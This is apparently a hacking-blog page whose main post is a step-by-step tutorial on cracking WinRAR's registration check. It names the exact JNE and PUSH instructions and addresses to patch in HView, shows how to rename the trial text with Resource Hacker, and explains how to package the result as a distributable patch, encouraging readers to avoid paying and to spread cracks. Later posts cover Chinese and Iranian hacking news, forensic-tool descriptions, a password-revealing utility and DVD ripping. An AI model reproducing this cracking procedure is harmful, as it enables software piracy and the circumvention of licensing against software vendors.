Learn to Crack any version of WinRAR – An Introduction to cracking

Hi folks,its been a long time since I have posted some thing technical,so I will be writing about the challenge I got at NIT KU, where I cracked WinRAR 3.80 using a disassembler and will tell you the same here. You can crack any version of WinRAR using this method and need not to pay for the registration fee and you can do this all by your self,easily. Furthermore, major software are cracked using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to cracking and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.

The Tools
To perform this hack you will be needing -

1. Any De-assembler (I use Hackers Disassembler and Hview )
2. Resource Hacker
3. A patch Creator ( Use Universal Patch Creator or Code fusion)

You will be able to get them by googling ..

How to Crack ?
You need to have a bit knowledge of assembly language,and in case you don't have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .

Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.



The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..



After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn't checks for the condition.


In the above code you can see this code -

00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12

This is the code responsible for validating you as a legal user :) . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71 .
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.


Now in the dialog box that opens,search for “please” and you will get the reference as -

ID-REMINDER, “Please purchase WinRAR license”

Double click on it and you will reach the subsequent code.


The code will be something like

* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB

Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.


Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.



After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.



After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -

Type .444B71 in place of 00444B71

and search in the code.



After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes -



After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.



Launch Resource Hacker, load the copyofwinrar.exe in it



Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one :P



and click on Compile Script button.



Now save the file with any name on your desktop or any location what so ever.



Now you have a fully patched WinRAR.exe file :)) you can either use it, or also can distribute it like a real cracker. If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.



Click on Add – ; Offset patch




After you have done that, double click on offset patch and then

1. Give path of original winrar.exe
2. Give path of unmodified Winrar.exe (again)
3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
4. Click on compare and it will show difference between both files
5. Click on save.

Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.



Congrats you have created a patch of your own and have learned to crack WinRAR :)



You can crack other software in the same way…just practice,debug and disassemble and you will get the way :)

[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. ]

Cheers
XERO

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.
 
POSTED BY XERO ALL RIGHTS RESERVED.

Technorati Tags: hacking,how to,security,tutorials,top articles,rdhacker,prohack,winrar,cracking,hacking tut,tools,security tutorial,introduction to cracking

read more "Learn to Crack any version of WinRAR – An Introduction to cracking"

Security hole in Gmail used by Chinese hackers was created by U.S. law enforcement

China states that it was not involved in the attacks on Google and other Silicon Valley corporations. They have even gone as far as to defend their regime of censorship and firewalling! The "accusation that the Chinese government participated in (any) cyberattack, either in an explicit or inexplicit way, is groundless and aims to denigrate China," a spokesman from the Chinese Ministry of Industry and Information Technology told the Xinhua Chinese news agency.

If China isn't behind these sophisticated, masterful attacks... who -- or what -- is?

In further news, there's a brilliant (but very opinionated) piece over on CNN by Bruce Schneier. The hackers used a backdoor in Gmail to gain access -- a backdoor required by U.S. law enforcement agencies. It's not uncommon for such rear entries to exist -- they started to appear in Western nations around the same time as anti-terrorism laws -- but the fact that such backdoors are easy to hack is a concern.

Basically, all major online services have such backdoors programmed into them. It's not crazy to assume that similar attacks were used on the other 30 Silicon Valley businesses. It's not such a problem that these backdoors exist -- it's a problem that once in place, someone will discover them -- they will be hacked.

Schneier finishes his CNN Opinion pieces with a poignant and chilling thought about the current state of technology and the things to come:

"The problem is that such control makes us all less safe. Whether the eavesdroppers are the good guys or the bad guys, these systems put us all at greater risk. Communications systems that have no inherent eavesdropping capabilities are more secure than systems with those capabilities built in. And it's bad civic hygiene to build technologies that could someday be used to facilitate a police state."

SOURCE: Download Squad

read more "Security hole in Gmail used by Chinese hackers was created by U.S. law enforcement"

Incom Tax Server Hacked: Rs11 crore was siphoned off

At least Rs11 crore of refunds were discovered to have been stolen last week by hacking into the password of some assessing officers who are responsible for crediting the refunds. The refunds were credited to fake accounts for which the returns had been filed electronically.

"We have stopped the payment and have been able to prevent at least two cases. Also investigation and action has been initiated by the Directorate of Income Tax (Investigation), Mumbai to detect the bank accounts to which the refunds had been credited and the beneficiaries," the finance ministry said.

All high value refunds issued during the current financial year will be checked again. "The system of handling high value refunds will be replaced with a more robust and foolproof system," the finance ministry said.

Income tax refunds could get delayed, said an official. Refunds in 2009-10 have doubled from the last year at Rs 12,421 crore as many refunds were deferred. It was Rs 6,899 crore the previous fiscal.

The investigators have identified the bank accounts, beneficiaries and some of those involved in the scam, the finance ministry claimed.

Central Bureau of Investigation and the Mumbai police are looking for the beneficiaries.

SOURCE: Indiatimes

read more "Incom Tax Server Hacked: Rs11 crore was siphoned off"

China paper slams US for cyber role in Iran unrest

China's Communist Party mouthpiece on Sunday accused the United States of mounting a cyber army and a "hacker brigade", and of exploiting social media like Twitter or Youtube to foment unrest in Iran.

The People's Daily accused the United States of controlling the Internet in the name of Internet freedom after Secretary of State Hillary Clinton called for more Internet freedoms in China and elsewhere in a speech on Thursday.

China on Friday warned that Washington's push against Internet censorship could harm ties.

"Behind what America calls free speech is naked political scheming. How did the unrest after the Iranian elections come about?" said the editorial, signed by Wang Xiaoyang.

"It was because online warfare launched by America, via Youtube video and Twitter microblogging, spread rumours, created splits, stirred up, and sowed discord between the followers of conservative reformist factions."

China has blocked Youtube since March, the anniversary of uprisings in Tibet, and Twitter since June, just before the 20th anniversary of a crackdown on protestors in and near Tiananmen Square. Facebook has been down since early July.

The People's asked rhetorically if obscene information or activities promoting terrorism would be allowed on the Internet in the U.S.

"We're afraid that in the eyes of American politicians, only information controlled by America is free information, only news acknowledged by America is free news, only speech approved by America is free speech, and only information flow that suits American interests is free information flow," it said.

Clinton's speech came shortly after Google revealed a sophisticated hacking attack, and said it might close its google.cn Chinese search engine if it could not find a way to offer a legal, unfiltered search service in China.

"Everyone with technical knowledge of computers knows that just because a hacker used an IP address in China, the attack was not necessarily launched by a Chinese hacker," Zhou Yonglin, deputy operations director of the National Computer Network Emergency Response Technical Team, said in an interview carried in a number of Chinese newspapers on Sunday.

Zhou mentioned an outage suffered by Chinese search engine Baidu on Jan. 12 but did not mention that it was attacked by the Iranian Cyber Army, which had previously attacked Twitter, nor that Chinese hackers launched retaliatory attacks on Iranian sites the next day.

The People's Daily also denounced a May ban on Microsoft's instant messaging services to nations covered by U.S. sanctions, including Cuba, Iran, Syria, Sudan and North Korea, as violating the U.S. stated desire for free information flow.

SOURCE: Reuters

read more "China paper slams US for cyber role in Iran unrest"

Recycle Bin Forensic Analysis Tool: RIFIUTI

Many important files within Microsoft Windows have structures that are undocumented. One of the principals of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there are a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Recycle Bin. Since this analysis technique is executed regularly, we researched the structure of the data found in the Recycle Bin repository files (INFO2 files). Rifiuti, the Italian word meaning "trash", was developed to examine the contents of the INFO2 file in the Recycle Bin. The foundation of Rifiuti's examination methodology is presented in the white paper located here. Rifiuti will parse the information in an INFO2 file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Rifiuti is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: rifiuti [options]

-t Field Delimiter (TAB by default)

Example Usage:

[kjones:rifiuti/rifiuti_20030410_1/bin] kjones% ./rifiuti INFO2 > INFO2.txt

Open INFO2.txt as a TAB delimited file in MS Excel to further sort and filter your results

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Recycle Bin Forensic Analysis Tool: RIFIUTI"

Learn How to display hidden password editbox fields using SHOWIN: Text behind the asterisks *****

ShoWin displays useful information about windows by dragging a cursor over them.

Perhaps one of the most popular uses of this program is to display hidden password editbox fields (text behind the asterisks *****). This will work in many programs although Microsoft have changed the way things work in some of their applications, most notably MS Office products and Windows 2000. ShoWin will not work in these cases. Neither will it work for password entry boxes on web pages, at least with most web browsers.

Additional features include the ability to enable windows that have been disabled, unhide hidden windows (try the program with the include invisibles option set and see how many windows you have on your desktop that you didn't know about!) and force windows to stay on top or be placed below others.

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Learn How to display hidden password editbox fields using SHOWIN: Text behind the asterisks *****"

Download free Security audit tool for Windows NT: NTLAST

NTLast is specifically targeted for serious security and IIS administration. Scheduled review of your NT event logs is critical for your network. A server breach can be uncovered by regular system auditing. Identifying and tracking who has gained access to your system, then documenting the details is now made easier with NTLast. This tool is able to quickly report on the status of IIS users, as well as filter out web server logons from console logons.

Key Features

• Reads saved .evt files - makes it easy to search through your archives
• Allows you to search before, after, and between dates - again to zoom in on something
• Filters logons 'From' a certain host - helps you zoom in on suspected intrusions
• Can save files in a csv format w/ time field formatted for Excel
• Filters out and distinguishes web log usage - cuts down search time

Shot of failed logons by user

Shot of the last ten logon failures by username in condensed mode - SOMEONE GUESSING A PASSWORD

Shot of IIS Activity

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Download free Security audit tool for Windows NT: NTLAST"

Compress Videos to smallest size

Okay..A video is nothing but a series of still images moving in fast motion such that they appear to be moving.I mean a sequence of still images representing scenes in motion.Frame rate, the number of still pictures per unit of time of video,ranges from PAL (Europe, Asia, Australia, etc.) and SECAM (France, Russia, parts of Africa etc.) standards specify 25 frame/s, while NTSC (USA, Canada, Japan, etc.) specifies 29.97 frame/s.The minimum frame rate to achieve the illusion of a moving image is about 15 frames per second or the video will be too jerky and you will be a dead jerk.
TERMINOLOGY 

• BITRATE/Datarate- The parameter of quality of Video,Higher Bitrate,greater size and gr8 quality.Reverse is ALSO true !
• FPS - Nopes..its not FIRST PERSON SHOOTER (Sorry gamers :P) Its Frames per second.Simply changing from 30 fps to 24 fps could result in as much as 20 percent file size reduction!It's better to choose a slightly lower, 'round-number' frame-rate in most cases, such as 24.0, or 25.0.
• CBR - Constant Bitrate.Variable Bitrate in compression leads to high quality audio/video with less file size.
• VBR - Variable Bitrate.Variable Bitrate in audio compression leads to less high quality audio as compared to VBR.Its Used for streaming purposes.
• MP1/2/4 or MPEG1/MPEG2/MPEG4 - A video format developed by Motion Pictures Experts Group and Hence the name.MPEG 1 was the first in series allowing for video playback.MPEG2 allows DVD quality and MPEG4 aims at steaming internet media and High compression technique.
• AVI - Audio Video Interleaved.One of the oldest formats available,It enjoys itself in new incarnations as DIVX and XVID.Its a shell in which other techniques/compression/encoding methods -are worked out.
• High Definition- Very high bitrate media used for home/personal viewing.

FORMATS


Due to popularization of video,flurry of video formats have flodded the market.But still the most popular ones remain WMV,AVI,MPEG1/2/4,DIVX,XVID,H.264,FLV,RMV,QUICKTIME and More...
Audio formats include MPEG3,Ogg,AC3,WMA,WAV,RM and many more..
Then comes the DVD and High Defination Media,Encoded at much high bitrate

TOOLS

The List is long..and You might not want everyone of them :) To get them,just Google the name.They are widely recognized .
WARNING
=======
[VIDEO ENCODERS/DECODERS ARE SYSTEM/MEMORY HOGS !!! SINCE ITS A VERY INTENSIVE AND TIME CONSUMING PROCESS,YOU MIGHT WANT TO FINISH IT ASAP]

• NERO - Available like booze and (almost) free. Make it enterprise (if u have not one already) and use NERO VISION to squeeze it out.Also supports editing.
• Avid - Professionals Use it...nice interface..but still costly.supports editing.
• IMTOO MPEG ENCODER - Terrific performance,supports exhaustive list of formats.Noobs and Newbie's,do yourself a favor and just stick to it.It will deliver almost everything you want (except editing).
• FFDSHOW - A collection of collective codecs.Use command line (if you like) to encode videos,or just watch/decode videos using it. It comes free with K-Lite mega codec pack :)
• VIRTUAl Dub - Free,fantastic and supports everything.But you might need to brainstorm for using it.supports editing and a lot of stuff !! Highly recommended for Geeks .
• AC3DEC - Used to decode AC3 audio files.Most of DVD's use this audio compression method.Get its GUI program to get the best out of it.
• FLASKMPEG - used to rip dvd's..well you have plenty of choices out there...

COMPRESSION

"SPEED VS QUALITY"

Compress using any format you want,full frames of even a 10 minute footage will eat up a lot of disk space in your PC.So..some of optimisation measures you can take to compress videos -

• Choose a good codec like DIVX/XVID,MPEG4 or WMV.
• When Aiming for MAXIMUM compression with MINIMUM quality loss,So just choosing the compressor is NOT ENOUGH..tweak accordingly bitrates (lower for low quality small file size and higher for more quality LARGE file size)
• If a larger video is shrunk to 320x240 or similar size, the quality will be MUCH HIGHER than by simply capturing the same video at 320x240.Shrinking the frame size from say 640x480 to say 320x240,will often result in about the same picture quality as the original 640x480 video,but the new 320x240 file will probably be much much smaller.
• Crop the video to get small frame size.
• Use low bitrate audio to get small size video.
• USE NO AUDIO for silent tutorials.
• Frame rate can drastically affect filesize.

My Setting for Internet publishing/Mobile phones (low end net connection) -

• CODEC - MPEG4
• VIDEO BITRATE - 128/160 KBPS
• AUDIO BITRATE (if any) - 32/48/64 KBPS
• FRAME RATE - 15/24/25/30 FPS (choose your pick :P )
• VIDEO SIZE - 320 X 240 for internet,176 X 144 for mobile phones

I use SNAG-IT 8 for as my screen capture program

DVD-RIP


FOR COMPRESSING 4 GB VIDEO MOVIE [Assuming you have .VOB files ready]


Section A for NOOBS


TOOL USED- IMTOO MPEG ENCODER

1. open IMTOO.
2. Select Movie File.
3. Select video size from menu.For DVD quality,choose 720 X 480.
4. Set Birate to 700-900 KBPS.
5. Set Framerate to 25 FPS.
6. Set aspect as you wish.
7. Set Audio Codec to MP3,Audio bitrate to 160 KBPS/192 KBPS
8.  Set Audio sample rate to 44100 Hz
9. Hit Encode and leave the PC alone for encoding of file.

Section B for GEEKS OUT THERE :D


TOOL USED - VIRTUAL DUB,AC3DEC,FLASKMPEG
*PLACE ALL .VOB FILES AT SAME FOLDER !
[1]. open FlaskMPEG to convert the VOB video files,select video file,Choose the type of codec (compressor/decompressor) you want to use generally that will be DivX.DIVX LOW MOTION is best for almost all movies and for those which have NO ACTION and Fast-Motion is only good when almost the entire movie is very fast paced like Terminator 2 or that of Final Fantasy - Advent Children..you get the idea.. and set bitrate to 900 KBPS,frame rate to 24/25 KBPS,choose output location,set process priority to high and hit encode and STAY AWAY FROM YOUR PC !!! After a looooooong time,you will have a single AVI file.
[2]. Put AC3DEC.exe in UR VOB FILE folder,run command prompt, and type-
ac3dec [FILENAME1.VOB] -allvobs -out [filename2.WAV]
NOTE -
* ac3dec is the name of the application being run -- you can also write "ac3dec.exe", with the identical effect
* FILENAME1 is the name of the first .vob file -- in this case 'vts_01_1'
* FILENAME2 is the name of the .wav file you are going to create -- you chose 'MI3Sound'
* -allvobs means to include all .vob files in the folder sequentially (as a single logical file)
* -out means you want to specify the name and path of the output file
Using the example above you will type this in prompt:

C:\MI3> ac3dec vts_01_1.vob -allvobs -out c:\windows\desktop\MI3.wav

Press Enter and the saving process will begin. After it finishes,close command prompt.You will have a file named MI3.wav on your desktop (approx 1GB).

[PS: GUI VERSION OWNERS WILL HAVE LESS HASSLES..BUT AFTER ALL THIS SECTION IS FOR GEEKS :P]
[3]. open Virtual Dub and select Movie File.Choose "Direct Stream Copy" from VIDEO menu.
[4]. Open the audio WAV file which was created by going to the AUDIO menu, and choosing "Use WAV file". Select the .wav file. Choose "Full Processing Mode" under Audio menu.
[5]. Then Choose "Compressor", choose the MP3 codec,Set Audio quality to 160 KBPS for high quality and 192 KBPS for Very High quality audio.
[6]. Then set 24.000 or 25.000 FPS from Frame rate option in video menu.
[7]. Choose "FILTERS" in the VIDEO menu and Add filters you want one at a time (if you wish).Configure it and use it accordingly.
[8]. Hit encode and in 25 to 50 minutes you will have your rip ready :)

NOTE : You can test how good the compression is so far, by compressing the resulting video file into a RAR file.Two Cases arise then -

1. If there is less than 5% compression,the compression is probably about as good as it will get.
2. If there is more than 5% compression,the audio and/or video can probably be compressed even further.h.264 or xvid/DIVX are your best bets for smallest file size at any given quality. Just keep in mind that eah has various quality settings that effect the compression, and thus the output size. You could use the same program to convert to each, but if the default settings are different,your output file size testing would be skewed.

FINDING SOFTWARE

DVD-Ripping software of all kinds can be gotten at www.divx-digest.com
www.download.com for all different kinds of programs

PS : Like this article ? You can always support me by buying me a coffee or You can always try some 
of the cool merchandize from PROHACK. POSTED BY XERO ALL RIGHTS RESERVED.

read more "Compress Videos to smallest size"

Iranian Cyber War Against Twitter

The image below shows what appeared when Twitter was googled during the compromise. The translation:

“In the name of God, As an Iranian this is a reaction to Twitter’s interference sly which was U.S. authorities ordered in the internal affairs of my country…”

It’s not the first time we see such a standard response from Twitter, but check out this picture from Twitter’s Platform Lead engineer, Alex Payne.

Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

[email protected]

U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?

WE PUSH THEM IN EMBARGO LIST

Take Care

The Email address provided gave the media access to the hackers, creating a wider reach for their message.

From the NY Times:

…the writing on the image which is not in English includes a line of Arabic script and the words “Ya Hussein” on the green flag, which is a reference to the prophet Muhammad’s grandson, who is revered in Iran. Further down the screen, there is a poem that says, roughly: ‘We will die if our leader orders us to fight, and if he wants, we will be patient and tolerant.’

SOURCE: www.penn-olson.com

read more "Iranian Cyber War Against Twitter"

How Secure Gmail Service Is ???

After Chinese hackers broke GOOGLE its services, Google has tightened up Gmail encryption.

Since 2008 users of Google mail have had the option of using the HTTPS protocol, which encrypts mail as it travels between the web browser and Google's servers.

Writing in google official blog, Google said that using HTTPS helps protect data from being snooped by third parties, such as in public WiFi hotspots.

Initially Google decided to leave the choice of using HTTPS all the time instead of just during user signon to its users because the more secure protocol did slow down traffic.

After researching the matter, Google now thinks that the benefits outweigh the drawbacks and has turned on HTTPS on for everyone all the time.

It is rolling out default HTTPS for everyone. If you've previously set your own preference in Gmail Settings to HTTPS, nothing will change for your account. If punters trust the security of their networks and don't want default HTTPS turned on for performance reasons, they can turn it off from the Gmail Settings menu.

read more "How Secure Gmail Service Is ???"

World's Largest Annual Hacker Conference, 26C3, Took place in Berlin last week

The 26th edition of the world's largest annual hacker conference, 26C3, took place in Berlin last week. With about 2,500 attendees, a combined total of 9,000 participants worldwide (via live streams), and an array of features that no other conference in the world can match, it was very much a milestone.

A bit on the word "hacker", as I know the term might be bothering some of you. A HACKER: one who tinkers, one who deconstructs out of a natural curiosity about how something works and how it could be made to do something it wasn't originally intended to do. Such abilities are akin to the skilled locksmith, and do not automatically make a hacker a criminal. Unfortunately for many who work in mainstream media, the word has been hijacked to be synonymous with "electronic evildoer". Yet, like many words that have been used to keep minority groups down, hackers are taking the label back.

Announcements such as the GSM encryption crack may have made international headlines last month, but something much more significant is clear: throughout the world, hackers have come out from their bunkers and opened up community spaces. They go by various names (co-working spaces, clubhouses, hideouts, space stations) and are a global-scale breakthrough for a community that for decades has not always been willing or able to go public. By opening up, they've not only gone public, but have also opened their doors to anyone curious or interested in the world of technology and how things work.

This phenomenon may be bigger than it has ever been, but in some corners of the world, it is not altogether new. Groups of German hackers have long organised themselves as officially recognised clubs and taken on challenges of a technical (or non-technical) nature. In North America, the movement has seen its greatest expansion in the past few years, with spaces such as NYC Resistor in Brooklyn, Pumping Station: One in Chicago and Noisebridge in San Francisco providing a creative space for a rapidly growing membership. The hacker space movement includes clubs in different parts of Latin America, as well as in South Africa, Israel, Iran, Dubai, Thailand, Malaysia, Singapore, Indonesia, Japan and Australia. Every month, the list gets longer as more groups come forward and post their details online at hackerspaces.org, a central hub and wiki for all info about spaces, including how to start one.

Among the attendees at the 26C3 conference were the people behind wikileaks, the wiki clearinghouse for leaked documents. In its first few years wikileaks has come under attack by governments and other large institutions who fear its growing influence and has made international headlines on several occasions, including when it was ordered to shut down by a California court in 2008 after documents were leaked related to offshore bank activities. Presenting at this year's congress, their goal was to explain how this project could become an essential tool for journalists throughout the world who seek sources and secure methods to protect the identity of those with access to – and brave enough to leak – sensitive information.

Also present was Bre Pettis and his Makerbot Industries. The knob on your dishwasher broke off? Trying in vain to contact customer assistance and find some way to get a replacement part? Well Pettis had a better idea, and by using a 3D printer, produced his own replacement knob. His tinkering with 3D printing has resulted in the founding of his very own company, Makerbot, which has actual employees and its own manufacturing space in Brooklyn, shipping Makerbots all over the world. Pettis didn't tell us to buy his stuff, but talked about what other people have been building and how he envisages a future where people aren't just consumers: he dreams of a return of the tradition of people making things.

It is hard not to be in awe of what this group of hackers was able to build for a four-day conference: its GSM network, an internal Dect phone system, a radio station, its own all-volunteer first aid and emergency rescue team and an indescribably fast network with capacity that no conference or municipality in the world can compete with. It is no wonder spaces are popping up everywhere, as hackers come out of the cupboards and stand proudly as the talented explorers and critical thinkers that they are.

SOURCE: www.guardian.co.uk

read more "World's Largest Annual Hacker Conference, 26C3, Took place in Berlin last week"

Download free Tools to examine NTFS for unauthorized activity: FORENSIC TOOLKIT

The Forensic ToolKit™ contains several Win32 Command line tools that can help you examine the files on a NTFS disk partition for unauthorized activity.

Key Features

• AFind is the only tool that lists files by their last access time without tampering the data the way that right-clicking on file properties in Explorer will. AFind allows you to search for access times between certain time frames, coordinating this with logon info provided from ntlast, you can to begin determine user activity even if file logging has not been enabled.
• HFind scans the disk for hidden files. It will find files that have either the hidden attribute set, or NT's unique and painful way of hiding things by using the directory/system attribute combination. This is the method that IE uses to hide data. HFind lists the last access times.
• SFind scans the disk for hidden data streams and lists the last access times.
• FileStat is a quick dump of all file and security attributes. It works on only one file at a time but this is usually sufficient.
• Hunt is a quick way to see if a server reveals too much info via NULL sessions.

Command Line Switches

afind [dir] /f [filename] /ns=no subs /a after /b before /m between

time format =

hfind [dir] /hd=find dir/system attribs /ns=no subs

sfind [dir] /ns=no subs

filestat [filename]

hunt [\\servername]

System Requirements

Windows NT 4.0 SP3

16MB Memory

Administrator privileges

Audit log enabled with searchable records

Set NT command line buffer to 500 or more lines. 1200 or more lines works well

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Download free Tools to examine NTFS for unauthorized activity: FORENSIC TOOLKIT"

Download free Internet Explorer activity forensic analysis tool: PASCO

Many important files within Microsoft Windows have structures that are undocumented. One of the principals of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there are a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's internet activity. Since this analysis technique is executed regularly, we researched the structure of the data found in Internet Explorer activity files (index.dat files). Pasco, the latin word meaning "browse", was developed to examine the contents of Internet Explorer's cache files. The foundation of Pasco's examination methodology is presented in the white paper located here. Pasco will parse the information in an index.dat file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Pasco is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: pasco [options]

-d Undelete Activity Records

-t Field Delimiter (TAB by default)

Example Usage:

[kjones:pasco/bin]% ./pasco index.dat > index.txt

Open index.txt as a TAB delimited file in MS Excel to further sort and filter your results:

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Download free Internet Explorer activity forensic analysis tool: PASCO"

Download Free Tool to Find Ascii, Unicode and Resource strings in a file: BINTEXT

A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.

Useful tip: Place a shortcut to Bintext in your Windows\SendTo folder so that you can automatically send files to BinText by right-clicking on their names and choosing Send To -> BinText from the drop-down menu. You can set this up by right-clicking on bintext.exe, selecting Copy then open up your Windows\SendTo folder, right click the mouse and select Paste Shortcut.

** NOTE: Some Anti-virus packages may falsely report this product as a keylogger/trojan application. Please upgrade to the latest anti-virus definitions as this has been corrected by most vendors.**

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Download Free Tool to Find Ascii, Unicode and Resource strings in a file: BINTEXT"

Dump Firefox AutoComplete files into XML Using DUMPAUTOCOMPLETE

This application will search for the default Firefox profile of the user who runs the tool and dump the AutoComplete cache in XML format to standard output. Alternatively, autocomplete files can be passed to the application and they will be parsed as well. This application understands mork based autocomplete files (Firefox 1.x) as well as SQLite based formhistory and webappsstore files (Firefox 2.x).

The download package contains a standalone windows application. The MSVCR71.dll maybe needed on systems that do not already have this file. The full Python source code is also included and can be run on Windows, Mac OS X, Linux, or any other system with Python installed (the additional "pysqlite2" modulal is required for SQLite based file parsing).

Usage: dumpAutoComplete [formhistory[.dat|.sqlite]]

Example Usage:

C:\Bin\> dumpAutoComplete > mydata.xml

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "Dump Firefox AutoComplete files into XML Using DUMPAUTOCOMPLETE"

A binary file byte-patching program: PATCHIT

A file byte-patching utility. This is driven by a simple scripting language. It can patch sequences of bytes in any file, search for byte patterns (with wildcards) and also extract and utilise DLL exported function addresses as source positions in files to be patched.

The total command list is as follows:

• MESSAGE <"message"> Displays a message during script execution.
• DIR <"directory path"> Optional directory path to search for files. For compatibility it is advisable not to use specific drive names in the path.
• FILE <"filename"> [filesize] Filename to patch. Optional filesize specifies the size that the file must match to be accepted.
• FIND [<*>]... Performs a search on the current file for the sequence of bytes that match ... up to max 256. Use the keyword * to match any byte. If a match is found then the PATCH file position value is set to the file position at which the found pattern begins.
• FUNCTION <"funcname"> Sets the current patch position to the file position of the given exported function name (case sensitive). It is assumed that the file being patched is a DLL.
• PATCH [[POS ] | [OFFSET ]] ... Patches the current file at optional file position/offset. Replaces orig_byte with new_byte. Fails if original byte read from file is not orig_byte.
• COPY <"orig_file"> <"new_file"> Copies "orig_file" to "new_file"
• DELETE <"filename"> Deletes the specified file.
• INIFILE <"filemame"> Specifies an INI file to be used in subsequent INI commands. This filename is relative to the last DIR directory path.
• INISECTION <"section"> Specifies an INI section name for use in subsequent INIWRITE commands
• INIWRITE <"keyname"> <"value"> Writes the given string value to the INI keyname in the previously specfied INI file's section.

It would be useful to write a program that performed the dual tasks of altering an application's behavior and at the same time kept a documented note of exactly what I had done to achieve the result in the form of the commented script file.

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

read more "A binary file byte-patching program: PATCHIT"

Iranian Cyber Army hit Baidu, China’s Internet search engine: Chinese hack back

The users who visited Baidu's Web site were redirected to a page with black screen that had an image of a green flag, and the page read in English and Arabic, "This site has been hacked by the Iranian Cyber Army."

The outage, which lasted for three and hours, affected many users as Baidu is China’s largest search engine, offering more than 50 search and community services.

Jeremy Rossi, a partner in Praetorian Security Group, a New York City-based security consultancy, told Computer World that it is likely that the Iranian Cyber Army attacked Baidu by altering its Domain Name System (DNS) at the registrar level.

There is a possibility that the hackers undertook a phishing attack to obtain a username and password that allowed them to access the records of Baidu at the registrar level, asserted Rossi.

The same method was used to hack Twitter in December. The company has said that a Twitter account was used to modify its DNS records.

The Twitter attack had lasted for more than an hour. The users who logged in were redirected to a page with black screen that had an image of a green flag, and the page read in English and Arabic that the site had been hacked by Iranian Cyber Army, asserting that they had the power to control and manage Internet.

